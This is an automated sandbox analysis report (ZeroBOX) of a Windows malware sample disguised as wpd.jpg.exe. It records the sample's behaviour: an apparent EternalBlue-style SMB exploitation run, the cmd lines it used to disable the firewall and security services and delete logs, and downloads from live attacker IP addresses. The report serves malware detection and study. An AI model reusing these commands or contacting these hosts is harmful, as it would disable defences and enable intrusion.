Summary | ZeroBOX
Gen1 Generic Malware Malicious Library Downloader task schedule UPX HTTP DNS ScreenShot Create Service KeyLogger Internet API P2P DGA Hijack Network Http API persistence FTP Socket Escalate priviledges Code injection PWS Sniff Audio Steal credential
Category ARCHIVE
Machine s1_win7_x6402
Started June 7, 2024, 5:48 p.m.
Completed June 7, 2024, 5:50 p.m.

Archive wpd.jpg.exe @ sandbox.zip

Summary

Size 8.4MB
Type PE32 executable (console) Intel 80386, for MS Windows
MD5 1bfe19a314dd31d6adda302f177c3b7c
SHA1 37fd59aa2c2b77c8757438075138f11eaedf81b8
SHA256 b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7
SHA512 b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638
CRC32 CD831527
ssdeep 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub
Yara
  • Network_Downloader - File Downloader
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
104.37.187.182 Active Moloch
139.5.177.32 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: get url: 104.37.187.182 success
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "csrs.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: [SC] StartService FAILED 1056: An instance of the service is already running.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] ChangeServiceConfig SUCCESS
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] StartService FAILED 1056: An instance of the service is already running.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] ChangeServiceConfig SUCCESS
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'sc1' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The service name is invalid.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: More help is available by typing NET HELPMSG 2185.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "csrs.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:10,602 - DEBUG -
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:10,602 - INFO - **************** ***mode:6*** ***addr:*** ***port:445*** ***addrs:*** ***user:*** ***user file path:*** ***pwd:*** ***pwds:*** ***threads:200*** ***cmd:*** ***batch file:*** ***listen port:9999*** ***************
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:10,602 - INFO - parser user pwd dic...
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:10,602 - INFO - start attack...
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:10,618 - DEBUG - mixedAttack...
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ecv total length: 4
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ecv empty data,break!
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,150 - INFO - blue attack target:192.168.56.102
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,150 - INFO - check target:192.168.56.102 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,227 - INFO - 192.168.56.102 OS:Windows 7 Professional N 7601 Service Pack 1
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,243 - INFO - 192.168.56.102 is not patched
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,243 - INFO - spoolss: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,243 - INFO - samr: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,259 - INFO - netlogon: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,259 - INFO - lsarpc: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,259 - INFO - browser: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,275 - DEBUG - Target OS: Windows 7 Professional N 7601 Service Pack 1
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,305 - DEBUG - SMB1 session setup allocate nonpaged pool success
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,322 - DEBUG - SMB1 session setup allocate nonpaged pool success
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,322 - DEBUG - good response status: INVALID_PARAMETER
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,322 - INFO - blueAttack is finished!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,618 - INFO - exploit attack target:192.168.56.102 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,618 - INFO - exploitrth:0 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,650 - INFO - exploitrth:1 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,650 - INFO - 192.168.56.102: Target OS: Windows 7 Professional N 7601 Service Pack 1
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,664 - INFO - exploitrth:2 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - DEBUG - 192.168.56.102 Not found accessible named pipe
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - Failure::exploit attack target:192.168.56.102 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:3 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:4 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:5 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:6 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:7 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,680 - INFO - exploitrth:8 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-08 00:30:11,697 - INFO - exploitrth:9 started!
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section xx0
section xx1
section xx2
resource name BIN
resource name TXT
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
wpd+0xb87553 @ 0xf87553
0x246

exception.instruction_r: 90 57 9c bf ad ba ac e1 66 f7 d7 66 f7 d7 66 81
exception.symbol: wpd+0xa66c71
exception.instruction: nop
exception.module: wpd.jpg.exe
exception.exception_code: 0x80000004
exception.offset: 10906737
exception.address: 0xe66c71
registers.esp: 849776
registers.edi: 15459136
registers.eax: 3758760026
registers.ebp: 851808
registers.edx: 55
registers.ebx: 4194304
registers.esi: 0
registers.ecx: 838
1 0 0
Time & API Arguments Status Return Repeated

bind

ip_address: 0.0.0.0
socket: 964
port: 0
1 0 0

bind

ip_address:
socket: 436
port: 0
1 0 0

bind

ip_address: 0.0.0.0
socket: 496
port: 9999
1 0 0

listen

socket: 496
backlog: 5
1 0 0

accept

ip_address: 127.0.0.1
socket: 496
port: 49885
1 516 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/xpxmr.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/ok/wpd.html
suspicious_features Connection to IP address suspicious_request GET http://104.37.187.182/wpdmd5.txt
suspicious_features Connection to IP address suspicious_request GET http://104.37.187.182/wpdtest.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/ver.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/shellver.txt
request GET http://104.37.187.182/xpxmr.txt
request GET http://104.37.187.182/ok/wpd.html
request GET http://104.37.187.182/wpdmd5.txt
request GET http://104.37.187.182/wpdtest.txt
request GET http://104.37.187.182/ver.txt
request GET http://104.37.187.182/shellver.txt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2144
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x01390000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3820
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00590000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
name BIN language LANG_CHINESE filetype empty sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00e90a5c size 0x0001e059
name TXT language LANG_CHINESE filetype empty sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00eaeab8 size 0x0008d49b
name RT_STRING language LANG_CHINESE filetype empty sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00f3bf54 size 0x00000038
name RT_VERSION language LANG_CHINESE filetype COM executable for DOS sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00e0c350 size 0x000002b8
file C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll
cmdline C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util._counter.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES3.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\_hashlib.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._constant_time.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcr90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\_socket.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\select.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._MD4.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\python27.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcm90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\msvcp90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37762\_ssl.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._DES.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\_cffi_backend.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Random.OSRNG.winrandom.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\pyexpat.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Util.strxor.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\cryptography.hazmat.bindings._openssl.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._AES.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Hash._SHA256.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\Crypto.Cipher._ARC4.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\bz2.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\_ctypes.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37762\unicodedata.pyd
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe")
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2144
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x01390000
process_handle: 0xffffffff
1 0 0
section xx2 size_of_data 0x0085f400 virtual_address 0x005ac000 virtual_size 0x0085f2c0 entropy 7.92303226231 description A section with a high entropy has been found
entropy 0.99953363647 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/941.png
url https://ssl.pstatic.net/static/pwe/common/img_use_mobile_version.png
url https://s.pstatic.net/shopping.phinf/20211101_9/6565979b-3e08-4e3d-8514-b2a585c9e46e.jpg
url http://uk.ask.com/favicon.ico
url http://www.priceminister.com/
url https://s.pstatic.net/static/www/mobile/edit/20210930/mobile_161522481722.png
url http://175.208.134.150:8282/test/test.eml
url https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211013_1095%2Fupload_1634111386163GV3Vc.JPEG%22
url http://es.wikipedia.org/
url https://www.semicolonworld.com/public/js/cookiealert.js
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/477.png
url http://blogimgs.naver.net/nblog/mylog/post/btn_cancel.gif
url https://www.semicolonworld.com/public/editor/styles/simditor.css
url http://busqueda.aol.com.mx/
url http://blogimgs.naver.net/nblog/guestbook/btn_close2.gif
url https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
url http://recherche.linternaute.com/
url https://s.pstatic.net/static/newsstand/up/2017/1122/nsd113655834.png
url http://www.yceml.net/0559/10408495-1499411010011
url https://ssl.pstatic.net/tveta/libs/1364/1364526/a5068a6f44555ea499da_20211029164146193.jpg
url https://tistory3.daumcdn.net/tistory/807805/skin/images/logo_tistory.gif
url http://busca.orange.es/
url http://ja.wikipedia.org/favicon.ico
url https://siape.veta.naver.com/fxshow?su=SU10599
url https://s.pstatic.net/shopping.phinf/20211013_2/ee5c113b-bfae-4cf3-81e3-2ba12403fc6d.jpg
url https://ssl.pstatic.net/static/pwe/nm/b.gif
url http://search.nifty.com/
url https://castbox.shopping.naver.com/js/lazyload.js
url https://ssl.pstatic.net/tveta/libs/1339/1339221/f1a87c541e410a8250af_20211006100906815.jpg
url http://ns.adobe.com/exif/1.0/
url https://s.pstatic.net/shopping.phinf/20200729_1/2931dd60-1842-4048-a39c-1e3389db4a0e.jpg
url https://ssl.pstatic.net/static/pwe/nm/spr_vertical_0d25bb77f8.png
url http://www.google.com.sa/
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/361.png
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/042.png
url https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211012_1095%2Fupload_1634015607233BeFLd.JPEG%22
url http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/056.png
url http://www.buzzadnetwork.com/jump/next.php?stamat=m%7CM-4iM-4jaQdHQBH0dEdHP3xP.0e7%2CboDB7XrVJDfRqYwVNhmAc8QRCrIuseXl_bWuTf_latOFYiGEzPpb7ikp5t8RPmTHyMRYDe1i9EJZLC6LSuccW1-YPggnMxkcwVirdNVGfgK3hFUbeKvFvqNv0-u8VxfrNUFB1gFhMN_8GLCn1znxf5_p0FJe0MYRI7nbfyajoqg_H3fvzrjsMsC0vAMYn2un8v5vcBfzwM-DewoZ7WId7geGlrySfAHx5KiJ5Hm90CU%2C
url http://fr.wikipedia.org/favicon.ico
url https://t1.daumcdn.net/tistory_admin/blogs/plugins/PreventCopyContents/js/functions.js?_version_=9024c9023ed6ab26b00b4f2905e46ffa08aeb336
url https://www.semicolonworld.com/public/editor/scripts/page-demo.js
url http://www.amazon.com/favicon.ico
url https://s.pstatic.net/dthumb.phinf/?src=%22https%3A%2F%2Fs.pstatic.net%2Fstatic%2Fwww%2Fmobile%2Fedit%2F20211029_1095%2Fupload_1635469564183PpB2J.jpg%22
url https://s.pstatic.net/static/newsstand/2020/logo/light/0604/038.png
url http://search.chol.com/favicon.ico
url https://ssl.pstatic.net/static/pwe/address/deskhome/spr_cp_loading.png
url http://purl.org/rss/1.0/
url http://www.google.es/
url https://www.google.com/pagead/drt/ui
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
cmdline sc start NlaSvc
cmdline C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline sc config NlaSvc start= auto
cmdline sc start netprofm
cmdline sc stop 1MpsSvc
cmdline C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline taskkill /im csrs.exe /f
cmdline taskkill /f /im csrs.exe
cmdline sc config 1MpsSvc start= disabled
cmdline sc config netprofm start= auto
cmdline sc config WinNsaSrv start= disabled
cmdline net stop WinNsaSrv
cmdline C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
host 104.37.187.182
host 139.5.177.32
description wpd.jpg.exe tried to sleep 197 seconds, actually delayed analysis time by 197 seconds
description csrs.exe tried to sleep 1741 seconds, actually delayed analysis time by 1741 seconds
url http://175.208.134.150:8282/test/test.eml
url http://104.37.187.182/ok/wpd.html
url http://175.208.134.150:8282/favicon.ico
url http://123.123.123.123
url http://192.168.3.119/
url http://104.37.187.182/wpdmd5.txt
url http://123.123.123.123:54321/dlr.arm
url https://192.168.3.119/
url http://139.5.177.32:9999/
url http://185.47.128.124:8124/m17010.txt
url http://139.5.177.32:9999
dead_host 139.5.177.32:9999
dead_host 192.168.56.102:49279
dead_host 192.168.56.103:445
dead_host 192.168.56.1:1433
dead_host 192.168.56.1:445
dead_host 192.168.56.102:49229
dead_host 192.168.56.103:1433